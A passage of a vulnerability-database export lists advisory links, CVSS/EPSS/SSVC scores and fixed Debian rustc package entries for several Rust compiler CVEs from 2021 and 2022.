reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/
reference_id QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QUPA37D57VPTDLSXOOGF4UXUEADOC4PQ/
16
reference_url https://access.redhat.com/errata/RHSA-2021:4033
reference_id RHSA-2021:4033
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4033
17
reference_url https://access.redhat.com/errata/RHSA-2021:4034
reference_id RHSA-2021:4034
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4034
18
reference_url https://access.redhat.com/errata/RHSA-2021:4035
reference_id RHSA-2021:4035
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4035
19
reference_url https://access.redhat.com/errata/RHSA-2021:4036
reference_id RHSA-2021:4036
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4036
20
reference_url https://access.redhat.com/errata/RHSA-2021:4037
reference_id RHSA-2021:4037
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4037
21
reference_url https://access.redhat.com/errata/RHSA-2021:4038
reference_id RHSA-2021:4038
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4038
22
reference_url https://access.redhat.com/errata/RHSA-2021:4039
reference_id RHSA-2021:4039
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4039
23
reference_url https://access.redhat.com/errata/RHSA-2021:4585
reference_id RHSA-2021:4585
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4585
24
reference_url https://access.redhat.com/errata/RHSA-2021:4586
reference_id RHSA-2021:4586
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4586
25
reference_url https://access.redhat.com/errata/RHSA-2021:4587
reference_id RHSA-2021:4587
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4587
26
reference_url https://access.redhat.com/errata/RHSA-2021:4588
reference_id RHSA-2021:4588
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4588
27
reference_url https://access.redhat.com/errata/RHSA-2021:4589
reference_id RHSA-2021:4589
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4589
28
reference_url https://access.redhat.com/errata/RHSA-2021:4590
reference_id RHSA-2021:4590
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4590
29
reference_url https://access.redhat.com/errata/RHSA-2021:4591
reference_id RHSA-2021:4591
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4591
30
reference_url https://access.redhat.com/errata/RHSA-2021:4592
reference_id RHSA-2021:4592
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4592
31
reference_url https://access.redhat.com/errata/RHSA-2021:4593
reference_id RHSA-2021:4593
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4593
32
reference_url https://access.redhat.com/errata/RHSA-2021:4594
reference_id RHSA-2021:4594
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4594
33
reference_url https://access.redhat.com/errata/RHSA-2021:4595
reference_id RHSA-2021:4595
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4595
34
reference_url https://access.redhat.com/errata/RHSA-2021:4596
reference_id RHSA-2021:4596
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4596
35
reference_url https://access.redhat.com/errata/RHSA-2021:4598
reference_id RHSA-2021:4598
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4598
36
reference_url https://access.redhat.com/errata/RHSA-2021:4599
reference_id RHSA-2021:4599
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4599
37
reference_url https://access.redhat.com/errata/RHSA-2021:4600
reference_id RHSA-2021:4600
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4600
38
reference_url https://access.redhat.com/errata/RHSA-2021:4601
reference_id RHSA-2021:4601
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4601
39
reference_url https://access.redhat.com/errata/RHSA-2021:4602
reference_id RHSA-2021:4602
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4602
40
reference_url https://access.redhat.com/errata/RHSA-2021:4649
reference_id RHSA-2021:4649
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4649
41
reference_url https://access.redhat.com/errata/RHSA-2021:4669
reference_id RHSA-2021:4669
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4669
42
reference_url https://access.redhat.com/errata/RHSA-2021:4694
reference_id RHSA-2021:4694
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4694
43
reference_url https://access.redhat.com/errata/RHSA-2021:4723
reference_id RHSA-2021:4723
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4723
44
reference_url https://access.redhat.com/errata/RHSA-2021:4724
reference_id RHSA-2021:4724
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4724
45
reference_url https://access.redhat.com/errata/RHSA-2021:4729
reference_id RHSA-2021:4729
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4729
46
reference_url https://access.redhat.com/errata/RHSA-2021:4730
reference_id RHSA-2021:4730
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4730
47
reference_url https://access.redhat.com/errata/RHSA-2021:4743
reference_id RHSA-2021:4743
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4743
48
reference_url https://www.starwindsoftware.com/security/sw-20220804-0002/
reference_id sw-20220804-0002
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://www.starwindsoftware.com/security/sw-20220804-0002/
49
reference_url https://www.unicode.org/reports/tr31/
reference_id tr31
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://www.unicode.org/reports/tr31/
50
reference_url https://www.unicode.org/reports/tr36/
reference_id tr36
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://www.unicode.org/reports/tr36/
51
reference_url https://www.unicode.org/reports/tr39/
reference_id tr39
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://www.unicode.org/reports/tr39/
52
reference_url https://www.unicode.org/reports/tr9/tr9-44.html#HL4
reference_id tr9-44.html#HL4
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://www.unicode.org/reports/tr9/tr9-44.html#HL4
53
reference_url https://www.scyon.nl/post/trojans-in-your-source-code
reference_id trojans-in-your-source-code
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://www.scyon.nl/post/trojans-in-your-source-code
54
reference_url https://trojansource.codes
reference_id trojansource.codes
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url https://trojansource.codes
55
reference_url http://www.unicode.org/versions/Unicode14.0.0/
reference_id Unicode14.0.0
reference_type
scores
0
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-06-11T15:16:49Z/
url http://www.unicode.org/versions/Unicode14.0.0/
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-42574
risk_score 3.9
exploitability 0.5
weighted_severity 7.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-69zd-gcvx-fuhr
2
url VCID-7ap9-xghv-dbdy
vulnerability_id VCID-7ap9-xghv-dbdy
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28876.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-28876
reference_id
reference_type
scores
0
value 0.00419
scoring_system epss
scoring_elements 0.61752
published_at 2026-04-01T12:55:00Z
1
value 0.00419
scoring_system epss
scoring_elements 0.61918
published_at 2026-04-29T12:55:00Z
2
value 0.00419
scoring_system epss
scoring_elements 0.61908
published_at 2026-04-24T12:55:00Z
3
value 0.00419
scoring_system epss
scoring_elements 0.61926
published_at 2026-04-26T12:55:00Z
4
value 0.00419
scoring_system epss
scoring_elements 0.61826
published_at 2026-04-02T12:55:00Z
5
value 0.00419
scoring_system epss
scoring_elements 0.61857
published_at 2026-04-04T12:55:00Z
6
value 0.00419
scoring_system epss
scoring_elements 0.61827
published_at 2026-04-07T12:55:00Z
7
value 0.00419
scoring_system epss
scoring_elements 0.61876
published_at 2026-04-08T12:55:00Z
8
value 0.00419
scoring_system epss
scoring_elements 0.61892
published_at 2026-04-09T12:55:00Z
9
value 0.00419
scoring_system epss
scoring_elements 0.61913
published_at 2026-04-11T12:55:00Z
10
value 0.00419
scoring_system epss
scoring_elements 0.61901
published_at 2026-04-12T12:55:00Z
11
value 0.00419
scoring_system epss
scoring_elements 0.61881
published_at 2026-04-13T12:55:00Z
12
value 0.00419
scoring_system epss
scoring_elements 0.61924
published_at 2026-04-16T12:55:00Z
13
value 0.00419
scoring_system epss
scoring_elements 0.61929
published_at 2026-04-18T12:55:00Z
14
value 0.00419
scoring_system epss
scoring_elements 0.61912
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-28876
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28876
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1949198
reference_id 1949198
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1949198
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
reference_id 986803
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
6
reference_url https://security.archlinux.org/AVG-1801
reference_id AVG-1801
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1801
7
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
url https://security.gentoo.org/glsa/202210-09
8
reference_url https://access.redhat.com/errata/RHSA-2021:3042
reference_id RHSA-2021:3042
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3042
9
reference_url https://access.redhat.com/errata/RHSA-2021:3063
reference_id RHSA-2021:3063
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3063
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-28876
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-7ap9-xghv-dbdy
3
url VCID-d8yv-ngej-1kf7
vulnerability_id VCID-d8yv-ngej-1kf7
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-31162.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-31162
reference_id
reference_type
scores
0
value 0.00737
scoring_system epss
scoring_elements 0.72765
published_at 2026-04-01T12:55:00Z
1
value 0.00737
scoring_system epss
scoring_elements 0.72913
published_at 2026-04-29T12:55:00Z
2
value 0.00737
scoring_system epss
scoring_elements 0.72905
published_at 2026-04-24T12:55:00Z
3
value 0.00737
scoring_system epss
scoring_elements 0.72915
published_at 2026-04-26T12:55:00Z
4
value 0.00737
scoring_system epss
scoring_elements 0.72773
published_at 2026-04-02T12:55:00Z
5
value 0.00737
scoring_system epss
scoring_elements 0.72793
published_at 2026-04-04T12:55:00Z
6
value 0.00737
scoring_system epss
scoring_elements 0.72769
published_at 2026-04-07T12:55:00Z
7
value 0.00737
scoring_system epss
scoring_elements 0.72808
published_at 2026-04-08T12:55:00Z
8
value 0.00737
scoring_system epss
scoring_elements 0.72822
published_at 2026-04-09T12:55:00Z
9
value 0.00737
scoring_system epss
scoring_elements 0.72846
published_at 2026-04-11T12:55:00Z
10
value 0.00737
scoring_system epss
scoring_elements 0.72829
published_at 2026-04-12T12:55:00Z
11
value 0.00737
scoring_system epss
scoring_elements 0.72821
published_at 2026-04-13T12:55:00Z
12
value 0.00737
scoring_system epss
scoring_elements 0.72862
published_at 2026-04-16T12:55:00Z
13
value 0.00737
scoring_system epss
scoring_elements 0.72873
published_at 2026-04-18T12:55:00Z
14
value 0.00737
scoring_system epss
scoring_elements 0.72864
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-31162
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31162
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1950398
reference_id 1950398
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1950398
5
reference_url https://security.archlinux.org/AVG-1801
reference_id AVG-1801
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1801
6
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
url https://security.gentoo.org/glsa/202210-09
7
reference_url https://access.redhat.com/errata/RHSA-2021:3042
reference_id RHSA-2021:3042
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3042
8
reference_url https://access.redhat.com/errata/RHSA-2021:3063
reference_id RHSA-2021:3063
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3063
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-31162
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d8yv-ngej-1kf7
4
url VCID-f4bw-5erp-4uc6
vulnerability_id VCID-f4bw-5erp-4uc6
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-29922.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-29922
reference_id
reference_type
scores
0
value 0.00325
scoring_system epss
scoring_elements 0.5542
published_at 2026-04-01T12:55:00Z
1
value 0.00325
scoring_system epss
scoring_elements 0.55497
published_at 2026-04-29T12:55:00Z
2
value 0.00325
scoring_system epss
scoring_elements 0.55505
published_at 2026-04-24T12:55:00Z
3
value 0.00325
scoring_system epss
scoring_elements 0.55522
published_at 2026-04-26T12:55:00Z
4
value 0.00325
scoring_system epss
scoring_elements 0.55531
published_at 2026-04-02T12:55:00Z
5
value 0.00325
scoring_system epss
scoring_elements 0.55557
published_at 2026-04-04T12:55:00Z
6
value 0.00325
scoring_system epss
scoring_elements 0.55533
published_at 2026-04-07T12:55:00Z
7
value 0.00325
scoring_system epss
scoring_elements 0.55585
published_at 2026-04-08T12:55:00Z
8
value 0.00325
scoring_system epss
scoring_elements 0.55587
published_at 2026-04-09T12:55:00Z
9
value 0.00325
scoring_system epss
scoring_elements 0.55596
published_at 2026-04-11T12:55:00Z
10
value 0.00325
scoring_system epss
scoring_elements 0.55576
published_at 2026-04-12T12:55:00Z
11
value 0.00325
scoring_system epss
scoring_elements 0.55558
published_at 2026-04-13T12:55:00Z
12
value 0.00325
scoring_system epss
scoring_elements 0.55595
published_at 2026-04-16T12:55:00Z
13
value 0.00325
scoring_system epss
scoring_elements 0.55598
published_at 2026-04-18T12:55:00Z
14
value 0.00325
scoring_system epss
scoring_elements 0.55577
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-29922
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29922
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1991962
reference_id 1991962
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1991962
5
reference_url https://security.archlinux.org/AVG-2263
reference_id AVG-2263
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-2263
6
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
url https://security.gentoo.org/glsa/202210-09
7
reference_url https://access.redhat.com/errata/RHSA-2021:4270
reference_id RHSA-2021:4270
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:4270
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-29922
risk_score 3.3
exploitability 0.5
weighted_severity 6.6
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-f4bw-5erp-4uc6
5
url VCID-fu46-5dhv-ckdt
vulnerability_id VCID-fu46-5dhv-ckdt
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28877.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-28877
reference_id
reference_type
scores
0
value 0.00274
scoring_system epss
scoring_elements 0.50792
published_at 2026-04-01T12:55:00Z
1
value 0.00274
scoring_system epss
scoring_elements 0.5083
published_at 2026-04-29T12:55:00Z
2
value 0.00274
scoring_system epss
scoring_elements 0.50862
published_at 2026-04-24T12:55:00Z
3
value 0.00274
scoring_system epss
scoring_elements 0.5087
published_at 2026-04-26T12:55:00Z
4
value 0.00274
scoring_system epss
scoring_elements 0.50847
published_at 2026-04-02T12:55:00Z
5
value 0.00274
scoring_system epss
scoring_elements 0.50873
published_at 2026-04-04T12:55:00Z
6
value 0.00274
scoring_system epss
scoring_elements 0.50831
published_at 2026-04-07T12:55:00Z
7
value 0.00274
scoring_system epss
scoring_elements 0.50888
published_at 2026-04-08T12:55:00Z
8
value 0.00274
scoring_system epss
scoring_elements 0.50886
published_at 2026-04-09T12:55:00Z
9
value 0.00274
scoring_system epss
scoring_elements 0.50928
published_at 2026-04-16T12:55:00Z
10
value 0.00274
scoring_system epss
scoring_elements 0.50907
published_at 2026-04-12T12:55:00Z
11
value 0.00274
scoring_system epss
scoring_elements 0.5089
published_at 2026-04-13T12:55:00Z
12
value 0.00274
scoring_system epss
scoring_elements 0.50934
published_at 2026-04-18T12:55:00Z
13
value 0.00274
scoring_system epss
scoring_elements 0.50914
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-28877
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28877
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1949204
reference_id 1949204
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1949204
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
reference_id 986803
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
6
reference_url https://security.archlinux.org/AVG-1802
reference_id AVG-1802
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1802
7
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
url https://security.gentoo.org/glsa/202210-09
8
reference_url https://access.redhat.com/errata/RHSA-2021:3042
reference_id RHSA-2021:3042
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3042
9
reference_url https://access.redhat.com/errata/RHSA-2021:3063
reference_id RHSA-2021:3063
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3063
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-28877
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-fu46-5dhv-ckdt
6
url VCID-j9kg-rd4y-y7by
vulnerability_id VCID-j9kg-rd4y-y7by
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2022-21658.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-21658
reference_id
reference_type
scores
0
value 0.00893
scoring_system epss
scoring_elements 0.7552
published_at 2026-04-02T12:55:00Z
1
value 0.00893
scoring_system epss
scoring_elements 0.7555
published_at 2026-04-04T12:55:00Z
2
value 0.00893
scoring_system epss
scoring_elements 0.75582
published_at 2026-04-13T12:55:00Z
3
value 0.00893
scoring_system epss
scoring_elements 0.75589
published_at 2026-04-12T12:55:00Z
4
value 0.00893
scoring_system epss
scoring_elements 0.75608
published_at 2026-04-11T12:55:00Z
5
value 0.00893
scoring_system epss
scoring_elements 0.75583
published_at 2026-04-09T12:55:00Z
6
value 0.00893
scoring_system epss
scoring_elements 0.75572
published_at 2026-04-08T12:55:00Z
7
value 0.00893
scoring_system epss
scoring_elements 0.7553
published_at 2026-04-07T12:55:00Z
8
value 0.00906
scoring_system epss
scoring_elements 0.75793
published_at 2026-04-18T12:55:00Z
9
value 0.00906
scoring_system epss
scoring_elements 0.75817
published_at 2026-04-24T12:55:00Z
10
value 0.00906
scoring_system epss
scoring_elements 0.75778
published_at 2026-04-21T12:55:00Z
11
value 0.00906
scoring_system epss
scoring_elements 0.75789
published_at 2026-04-16T12:55:00Z
12
value 0.00906
scoring_system epss
scoring_elements 0.75834
published_at 2026-04-29T12:55:00Z
13
value 0.00906
scoring_system epss
scoring_elements 0.75823
published_at 2026-04-26T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-21658
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21658
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2041504
reference_id 2041504
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2041504
5
reference_url https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946
reference_id 32ed6e599bb4722efefd78bbc9cd7ec4613cb946
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://github.com/rust-lang/rust/pull/93110/commits/32ed6e599bb4722efefd78bbc9cd7ec4613cb946
6
reference_url https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf
reference_id 406cc071d6cfdfdb678bf3d83d766851de95abaf
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://github.com/rust-lang/rust/pull/93110/commits/406cc071d6cfdfdb678bf3d83d766851de95abaf
7
reference_url https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714
reference_id 4f0ad1c92ca08da6e8dc17838070975762f59714
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://github.com/rust-lang/rust/pull/93110/commits/4f0ad1c92ca08da6e8dc17838070975762f59714
8
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/
reference_id 7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7JKZDTBMGAWIFJSNWKBMPO5EAKRR4BEW/
9
reference_url https://github.com/rust-lang/rust/pull/93110
reference_id 93110
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://github.com/rust-lang/rust/pull/93110
10
